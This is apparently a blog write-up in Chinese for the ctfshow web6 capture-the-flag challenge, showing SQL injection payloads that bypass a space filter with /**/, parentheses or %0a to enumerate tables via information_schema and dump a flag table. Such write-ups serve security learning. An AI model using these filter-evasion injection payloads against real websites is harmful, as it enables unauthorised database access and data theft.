首页 > 数据库 >ctfshow--web6 sql注入空格绕过

ctfshow--web6 sql注入空格绕过

时间:2024-04-03 23:11:06浏览次数:24  
标签:web2 -- 空格 union flag web6 ctfshow select schema

这道题目空格被过滤了,那么我们可以用/**/来替换空格

'union/**/select/**/1,(select/**/database()),3# //查看数据库名名字为web2
image
查看web2下的表名
'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'/**/),3#
image
查看flag表下的所有字段也就是所有列名
'union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='web2'/**/),3#
image
查看flag表下的flag列的所有内容拿到flag
'union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/flag),3#
image
当然绕过空格的方式还有很多种
比如用 () 来绕过
'union(select(1),(select(group_concat(flag))from(flag)),3)#
或者用%0a来绕过
image

标签:web2,--,空格,union,flag,web6,ctfshow,select,schema
From: https://www.cnblogs.com/wssw/p/18113647

相关文章

  • Jetpack Compose(4)——重组
    目录一、状态变化1.1状态变化是什么1.2mutableStateListOf和mutableStateMapOf二、重组的特性2.1Composable重组是智能的2.2Composable会以任意顺序执行2.3Composable会并发执行2.4Composable会反复执行2.5Composable的执行是“乐观”的三、重组范围四、参数类型的......
  • 第十四届省赛大学B组(C/C++)子串简写
    原题链接:子串简写程序猿圈子里正在流行一种很新的简写方法:对于一个字符串,只保留首尾字符,将首尾字符之间的所有字符用这部分的长度代替。例如 internationalization 简写成 i18n,Kubernetes 简写成 K8s,Lanqiao 简写成 L5o 等。在本题中,我们规定长度大于等于 K 的字......
  • 注意力机制在自然语言处理中的原理与实践
    注意力机制在自然语言处理中的原理与实践作者:禅与计算机程序设计艺术1.背景介绍近年来,注意力机制在自然语言处理领域取得了巨大的成功,在机器翻译、文本摘要、对话系统等众多应用中发挥了关键作用。注意力机制通过学习输入序列中的重要位置和相关性,赋予不同的输入部分......
  • 【HTML】简单制作一个动态3D正方体
     目录前言开始HTML部分JS部分CSS部分效果图总结前言    无需多言,本文将详细介绍一段代码,具体内容如下: 开始    首先新建文件夹,创建两个文本文档,其中HTML的文件名改为[index.html],JS的文件名改为[script.js],CSS的文件名改为[style.css],创建好后......
  • 图像分类模型AlexNet原理与实现
    图像分类模型AlexNet原理与实现作者:禅与计算机程序设计艺术1.背景介绍图像分类是计算机视觉领域的一个核心任务,其目标是将输入图像归类到预定义的类别中。随着深度学习技术的发展,基于卷积神经网络(ConvolutionalNeuralNetwork,CNN)的图像分类模型取得了突破性的进......
  • 37.深⼊理解指针(2)
    1.数组名的理解intarr[10]={1,2,3,4,5,6,7,8,9,10};int*p=&arr[0];这⾥我们使⽤&arr[0]的⽅式拿到了数组第⼀个元素的地址,但是其实数组名本来就是地址,⽽且是数组⾸元素的地址,我们来做个测试。#include<stdio.h>intmain(){intarr[10]={1,2,3,4,5,6,......
  • 线性代数在AI中的应用
    线性代数在AI中的应用作者:禅与计算机程序设计艺术1.背景介绍人工智能(AI)作为当今技术发展的前沿领域,在近几年中迅速崛起,在各行各业都得到了广泛的应用。这其中,线性代数作为AI算法的基础数学工具,在AI模型的构建、训练和优化中发挥着关键作用。本文将深入探讨线性代......
  • 生成对抗网络的Wasserstein距离:度量两个概率分布之间距离
    生成对抗网络的Wasserstein距离作者:禅与计算机程序设计艺术1.背景介绍生成对抗网络(GenerativeAdversarialNetwork,GAN)是近年来机器学习领域最重要的创新之一。GAN通过训练两个相互竞争的神经网络模型—生成器(Generator)和判别器(Discriminator),从而学习生成接近真实数......
  • java毕业设计大全
     链接:Java毕业设计列表2600套包含论文vx:Lunique0129  文档较大,请耐性等待,可用电脑打开,(CTRL+F)精准搜索题目关键词查询需要源码的同学添加微信,你有题目我就有项目包安装运行成功(两千多套)Java课程设计学习参考,对学计算机的大学生来说非常适合学习与参考。持续更新中。。......
  • 拜占庭大战
    2200年,拜占庭帝国研发出了超光速航行技术,正式迈入了争霸的行列。在2245年,神秘的力量(wuhupai托管了,ai实在太蠢了)上台,对国内经济大幅改革,让拜占庭从第22位上升到了第3位在2260年,一个最强的ai对我们宣战了,wuhupai靠着换家拖住了ai的舰队,然后赢下了这场战争,获得了3个殖民地,经济实......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99